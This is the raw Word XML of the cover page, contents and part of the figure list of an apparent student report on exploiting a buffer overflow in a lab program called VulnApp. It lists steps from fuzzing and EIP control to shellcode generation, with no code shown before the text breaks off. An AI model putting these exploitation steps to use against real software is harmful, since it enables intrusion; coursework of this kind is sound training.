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001D0" w14:textId="77777777" w:rsidR="00856259" w:rsidRPr="008A5F4C" w:rsidRDefault="00D85677">
      <w:r w:rsidRPr="00D85677">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="44546A"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="75DCE50D" wp14:editId="364C250D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7772400" cy="10058400"/>
                <wp:effectExtent l="0" t="0" r="0" b="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058400"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DEECEC"/>
                        </a:solidFill>
                        <a:ln w="25400" cap="flat">
                          <a:no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32983" id="Rectangle 6" o:spid="_x0000_s1026" alt="&quot;&quot;" style="position:absolute;margin-left:0;margin-top:0;width:612pt;height:11in;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" fillcolor="#deecec" stroked="f" strokeweight="2pt">
                <v:stroke miterlimit="4"/>
                <v:textbox inset="3pt,3pt,3pt,3pt"/>
                <w10:wrap anchorx="page" anchory="page"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9498" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="2018"/>
      </w:tblGrid>
      <w:tr w:rsidR="005276A8" w14:paraId="2E3DB520" w14:textId="77777777" w:rsidTr="009E3B85">
        <w:trPr>
          <w:trHeight w:val="1349"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13526AB9" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="005276A8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD4ECBC" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="005276A8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128AC49D" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="00537DAC" w:rsidP="00537DAC">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="00173543">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22362AFB" wp14:editId="131BAF0F">
                      <wp:extent cx="399245" cy="399245"/>
                      <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
                      <wp:docPr id="2" name="Oval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99245" cy="399245"/>
                              </a:xfrm>
                              <a:prstGeom prst="ellipse">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B675BA6" id="Oval 2" o:spid="_x0000_s1026" alt="&quot;&quot;" style="width:31.45pt;height:3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" fillcolor="#eed0c6 [3206]" stroked="f" strokeweight="2pt">
                      <w10:anchorlock/>
                    </v:oval>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1FAF3FF1" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="009E3B85" w:rsidP="00537DAC">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E3B85">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Network Penetration Testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="144B77C0" w14:textId="6CC00F09" w:rsidR="009E3B85" w:rsidRPr="009E3B85" w:rsidRDefault="009E3B85" w:rsidP="009E3B85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E3B85">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>CRN 50250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276A8" w14:paraId="76E8D719" w14:textId="77777777" w:rsidTr="009E3B85">
        <w:trPr>
          <w:trHeight w:val="2858"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9498" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="105A6532" w14:textId="1F089798" w:rsidR="005276A8" w:rsidRPr="00537DAC" w:rsidRDefault="009E3B85" w:rsidP="00ED38DD">
            <w:pPr>
              <w:pStyle w:val="Title"/>
            </w:pPr>
            <w:r>
              <w:t>Buffer Overflow Exploitation Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED38DD" w14:paraId="1801E07B" w14:textId="77777777" w:rsidTr="009E3B85">
        <w:trPr>
          <w:trHeight w:val="6768"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9498" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D90D32A" w14:textId="0AB89650" w:rsidR="00ED38DD" w:rsidRDefault="009E3B85" w:rsidP="00ED38DD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="666B25EB" wp14:editId="3B3B7945">
                      <wp:extent cx="5380990" cy="4238625"/>
                      <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                      <wp:docPr id="9" name="Group 9"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="5380990" cy="4238625"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="2818765" cy="3180080"/>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2818765" cy="2818765"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                              </pic:spPr>
                            </pic:pic>
                            <wps:wsp>
                              <wps:cNvPr id="7" name="Text Box 7"/>
                              <wps:cNvSpPr txBox="1"/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="2818765"/>
                                  <a:ext cx="2818765" cy="361315"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:prstClr val="white"/>
                                </a:solidFill>
                                <a:ln>
                                  <a:noFill/>
                                </a:ln>
                                <a:effectLst/>
                                <a:sp3d/>
                              </wps:spPr>
                              <wps:txbx>
                                <w:txbxContent>
                                  <w:p w14:paraId="6C16AB9D" w14:textId="73A81651" w:rsidR="00220A2F" w:rsidRPr="009E3B85" w:rsidRDefault="00220A2F" w:rsidP="009E3B85">
                                    <w:pPr>
                                      <w:rPr>
                                        <w:sz w:val="18"/>
                                        <w:szCs w:val="18"/>
                                      </w:rPr>
                                    </w:pP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wpg:wgp>
                        </a:graphicData>
                      </a:graphic>
                    </wp:inline>
                  </w:drawing>
                </mc:Choice>
                <mc:Fallback>
                  <w:pict>
                    <v:group w14:anchorId="666B25EB" id="Group 9" o:spid="_x0000_s1026" style="width:423.7pt;height:333.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="28187,318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28187;height:28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">
                        <v:imagedata r:id="rId13" o:title=""/>
                      </v:shape>
                      <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                        <v:stroke joinstyle="miter"/>
                        <v:path gradientshapeok="t" o:connecttype="rect"/>
                      </v:shapetype>
                      <v:shape id="Text Box 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;top:28187;width:28187;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" stroked="f">
                        <v:textbox inset="4pt,4pt,4pt,4pt">
                          <w:txbxContent>
                            <w:p w14:paraId="6C16AB9D" w14:textId="73A81651" w:rsidR="00220A2F" w:rsidRPr="009E3B85" w:rsidRDefault="00220A2F" w:rsidP="009E3B85">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="18"/>
                                  <w:szCs w:val="18"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:shape>
                      <w10:anchorlock/>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005276A8" w14:paraId="2E395D8B" w14:textId="77777777" w:rsidTr="009E3B85">
        <w:trPr>
          <w:trHeight w:val="2736"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3740" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5E95EBA6" w14:textId="77777777" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00ED38DD">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A242044" w14:textId="77777777" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00ED38DD">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B0D8994" w14:textId="387E237C" w:rsidR="005276A8" w:rsidRDefault="005276A8" w:rsidP="00ED38DD">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Toc64633246"/>
            <w:r w:rsidRPr="00173543">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F90DDBF" wp14:editId="2397E286">
                      <wp:extent cx="1378039" cy="51516"/>
                      <wp:effectExtent l="0" t="0" r="6350" b="0"/>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8039" cy="51516"/>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B8F9231" id="Rectangle 4" o:spid="_x0000_s1026" alt="&quot;&quot;" style="width:108.5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" fillcolor="#eed0c6 [3206]" stroked="f" strokeweight="2pt">
                      <w10:anchorlock/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="5D34853B" w14:textId="15D4E54D" w:rsidR="00D00ED1" w:rsidRPr="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00D00ED1">
            <w:pPr>
              <w:pStyle w:val="TitlePage-Version"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D00ED1">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Date: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>February 15</w:t>
            </w:r>
            <w:r w:rsidRPr="00D00ED1">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>, 2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E809EA" w14:textId="3BC15C29" w:rsidR="00D00ED1" w:rsidRPr="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00D00ED1">
            <w:pPr>
              <w:pStyle w:val="TitlePage-Version"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D00ED1">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Project: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>02-21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD13BE9" w14:textId="77777777" w:rsidR="00D00ED1" w:rsidRPr="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00D00ED1">
            <w:pPr>
              <w:pStyle w:val="TitlePage-Version"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D00ED1">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Version 1.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B59F73E" w14:textId="1961EFAD" w:rsidR="005276A8" w:rsidRDefault="005276A8" w:rsidP="00ED38DD">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="656ED279" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="005276A8" w:rsidP="00ED38DD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="678D5AB3" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="005276A8" w:rsidP="00ED38DD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="34DD70B3" w14:textId="77777777" w:rsidR="005276A8" w:rsidRDefault="005276A8" w:rsidP="00ED38DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="229E00F9" w14:textId="1019452B" w:rsidR="00BE02BB" w:rsidRDefault="005D4907">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="14D9E528" wp14:editId="0638E509">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7772400" cy="5029200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="Rectangle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5029200"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent3">
                            <a:alpha val="40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F713D" id="Rectangle 8" o:spid="_x0000_s1026" alt="&quot;&quot;" style="position:absolute;margin-left:0;margin-top:0;width:612pt;height:396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" fillcolor="#eed0c6 [3206]" stroked="f" strokeweight="2pt">
                <v:fill opacity="26214f"/>
                <v:stroke miterlimit="4"/>
                <v:textbox inset="3pt,3pt,3pt,3pt"/>
                <w10:wrap anchorx="page" anchory="page"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E3B85" w14:paraId="2C8B90A6" w14:textId="77777777" w:rsidTr="00ED38DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="EED0C6" w:themeColor="accent3"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FB8B885" w14:textId="77777777" w:rsidR="009E3B85" w:rsidRDefault="009E3B85" w:rsidP="00AA7317">
            <w:pPr>
              <w:pStyle w:val="Text"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1122305629"/>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58374E58" w14:textId="1F2160DD" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4B4AD6E5" w14:textId="654BCDB6" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00D00ED1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="00D00ED1">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
            <w:t>Table of Contents……………………………………………………………………………………………….2</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="281FB0DC" w14:textId="11708222" w:rsidR="00957B8D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t>Executive Summary……………………………………………………………………………………………….3</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="243D1BDC" w14:textId="02C7CDE8" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              Phases of Penetration Test………………………………………………………………………3</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7EEC4A9D" w14:textId="547A617C" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              Findings Overview………………………………………………………………………………… 3</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1A1F6916" w14:textId="07FA8FB7" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              Recommendations………………………………………………………………………………… 4</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="36BECEC7" w14:textId="4D31ED4B" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              Severity Scale…………………………………………………………………………………………4</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0F6947C4" w14:textId="684ED9F8" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t>Exploitation………………………………………………………………………………………………………....5</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="192A15A9" w14:textId="734026AF" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              1.Fuzzing To Check Vulnerability……………………………………………………………..5</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7F1908F9" w14:textId="50B11E52" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              2.Generating A Pattern To Find The Offset……………………………………………….7</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="35E5006A" w14:textId="269EB9CC" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              3.Overwritting And Controlling The EIP…………………………………………………..9</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="324A9B68" w14:textId="59D64243" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              4.Identifying Bad Characters.............................................................................</w:t>
          </w:r>
          <w:r w:rsidR="00984B08">
            <w:t>10</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1909281E" w14:textId="501346A8" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              5.Identifying The Right Module........................................................................</w:t>
          </w:r>
          <w:r w:rsidR="00984B08">
            <w:t>11</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4D226D7F" w14:textId="705C2490" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t xml:space="preserve">              6.Generating The Shell Code.............................................................................</w:t>
          </w:r>
          <w:r w:rsidR="00984B08">
            <w:t>14</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="19C4E5BD" w14:textId="2F0B55F3" w:rsidR="00EA759D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D">
          <w:r>
            <w:t>Appendix.............................................................................................................................</w:t>
          </w:r>
          <w:r w:rsidR="00984B08">
            <w:t>16</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="125CD0F6" w14:textId="77777777" w:rsidR="00EA759D" w:rsidRPr="00957B8D" w:rsidRDefault="00EA759D" w:rsidP="00957B8D"/>
        <w:p w14:paraId="65DAFD7C" w14:textId="77777777" w:rsidR="00D00ED1" w:rsidRPr="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00D00ED1"/>
        <w:p w14:paraId="398BCD8E" w14:textId="77777777" w:rsidR="008822EB" w:rsidRDefault="00D00ED1">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="799CA968" w14:textId="6BABD15D" w:rsidR="00D00ED1" w:rsidRDefault="008822EB">
      <w:r>
        <w:t>Table of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C8676" w14:textId="200F4DB6" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1"/>
    <w:p w14:paraId="6B992541" w14:textId="2E472360" w:rsidR="008822EB" w:rsidRDefault="008822EB">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc64889312" w:history="1">
        <w:r w:rsidRPr="000C6255">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1.1: fuzzScript.py</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D37261F" w14:textId="7F58CBEB" w:rsidR="008822EB" w:rsidRDefault="008822EB">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc64889313" w:history="1">
        <w:r w:rsidRPr="000C6255">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1.2: Attaching VulnApp to Immunity Debugger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc64889313 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77BE68AC" w14:textId="1491E79E" w:rsidR="008822EB" w:rsidRDefault="008822EB">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc64889314" w:history="1">
        <w:r w:rsidRPr="000C6255">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1.3: Immunity Debugger running VulnApp.exe</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EC28099" w14:textId="5B0FE3CA" w:rsidR="008822EB" w:rsidRDefault="008822EB">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc64889315" w:history="1">
        <w:r w:rsidRPr="000C6255">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1.4:Running fuzzScript.py and crash message</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc64889315 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
